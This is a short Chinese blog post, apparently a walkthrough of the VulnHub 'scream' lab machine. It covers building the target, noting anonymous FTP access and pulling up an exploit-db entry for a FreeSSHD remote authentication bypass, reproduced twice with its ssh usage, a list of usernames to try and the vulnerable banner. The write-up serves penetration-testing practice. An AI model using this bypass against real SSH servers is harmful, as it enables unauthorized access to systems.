Vulnhub靶机 scream

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量915 收藏
点赞数 1
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/105789265
版权

在这里插入图片描述

打开scream.exe

在这里插入图片描述

选择winxp_pro_with_sp2.iso
下载链接:ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/
等待加载
然后点击3的那个按钮
生成一个.iso文件
这个.iso文件就是靶机了
然后去VM里新建虚拟机就可以了

在这里插入图片描述
在这里插入图片描述

21端口 ftp允许任何人登录

直接试试ssh
搜索漏洞
刚好有个
Remote Authentication Bypass

root@kali:~# cat /usr/share/exploitdb/exploits/windows/remote/23080.txt                                                                                                                                    
FreeSSHD all version Remote Authentication Bypass ZERODAY                                                                                                                                                  
Discovered & Exploited by Kingcope                                                                                                                                                                         
Year 2011                                                                                                                                                                                                  

# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23080.zip

Run like:

ssh.exe -l<valid username> <host>

valid username might be:

root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp

or anything you can imagine.


The vulnerable banner of the most recent version is:

SSH-2.0-WeOnlyDo 2.1.3


For your pleasure,

KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011

Run like:

ssh.exe -l<valid username> <host>

valid username might be:

root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp

or anything you can imagine.


The vulnerable banner of the most recent version is:

SSH-2.0-WeOnlyDo 2.1.3


For your pleasure,

Kingcope
root@kali:~#

直接利用这个漏洞就可以提权了

菜浪马废
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3028
每台都做一做,然后记录在博客里.供自己和大家一起学习.
oscp学习计划二期
菜浪马废的博客
04-29 1247
一期 只有一点点基础知识的我 看着Google和vulnhub 一边刷练习 一边看笔记 慢慢也有了自己的知识框架 但是还是感觉准备的不充分 笔记 之前就拿CSDN做笔记了 每篇博客都很少有文字 大多都是我的操作截图 不是特别正规 为了备战 明天开始用官方的报告来写 但是他是五个一组 就是在一个文件中 要对五个靶机进行描述 希望我可以一天打五个靶机吧(现在一天最多3) 报告模板已经给了链接 有需要的...
Vulnhub靶机_RAGNAR LOTHBROK: 1
学术渣渣的博客
03-22 3724
靶机 RAGNAR LOTHBROK:1
VulnHub靶机 DC-9 靶机 详细渗透过程
最新发布
rumil的博客
04-27 847
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
FreeSSHd 远程身份验证绕过漏洞利用
小亮的博客
12-17 1815
先看漏洞介绍。点这里 -------------------------------------------------------------------------------- 发布日期:2012-12-03 更新日期:2012-12-27 受影响系统: freeSSHd freeSSHd 1.2.6 描述: BUGTRAQ  ID: 56785  CVE(CAN) ID: ...
VMware Server中虚拟机随宿主机自动启动
afeyfre41671的博客
08-27 234
在options页面, 开启 Start Up and Shut Down Virtual Machines 这个选项. 保存退出. 打开 VMWare Server Console, 打开需要自动启动的虚拟机. VM->Settings->Options->Startup/Shudown 选中 this user , 并添如管理员用户密码 在 on ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulhub漏洞复现
weixin_45995579的博客
09-30 1693
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
撸吧坑死宝宝了
热门推荐
weixin_34378969的博客
07-13 2万+
2019独角兽企业重金招聘Python工程师标准>>> ...
对于JAVA实现SFTP实例-SSH-2.0-OpenSSH_5.3等报错解决
Carey丶zsh 的博客
05-17 1万+
因为使用java链接ftp报一下错误 org.apache.commons.net.MalformedServerReplyException: Could not parse response code. Server Reply: SSH-2.0-OpenSSH_5.3 在网上找了一会发现一个兄弟写的帮助了我  http://www.cnblogs.com/chen1987lei/ar
WeOnlyDo.Server服务器介绍
zhang116868的专栏
10-10 1648
WeOnlyDo.Server服务器相当于自己写的Web服务器,不过和IIS、Tomcat比起来会简单很多,但用来实现自己的功能也会非常方便,笔者现在手头有C#和VB实现的两个版本。 WeOnlyDo.Server服务器的核心类是:WeOnlyDo.Server.WebServer,主要实现对Web服务器的配置及启动操作: WeOnlyDo.Server....
SSH and FTP使用
茹茹的博客
06-03 673
Lab 1: Working with SSH and FTP software Top of Form Bottom of Form Pre-Lab Tasks Preliminaries: You are supposed to accomplish the 5 actions in "Required Course Materials". Ask for a help...
从sourceforge的镜像站下载软件(OWASP靶机
banerye的博客
07-04 4076
sourceforge是开源软件的开发者进行开发管理的集中式场所。 但是它经常崩,有一些软件就下不了。 可以尝试到这个镜像网站去下载: ????UK mirror server 下载方式:以owaspbwa(owasp渗透靶机)为例 该网站是按照字典序分目录的。 依次选择o/ow/owaspbwa,接着就可以看到能够下载的版本了。 下载时再用上一篇说的方法加速下载,速度比官网不知道快到哪里去了。???? 上一篇文章链接: 用种子下载程序加速下载 ...
靶机合集-总结
m0_50627257的博客
09-17 854
一、漏洞利用、实战练习平台 1、WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy https://github.com/RandomStorm/DVWA 2、DoraBox,多拉盒 - 掌握常见漏洞攻防 https://github.com/gh0stkey/DoraBox 3、一个功能很全的CTF平台 https://github.com/zjlywjh001/PhrackC
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值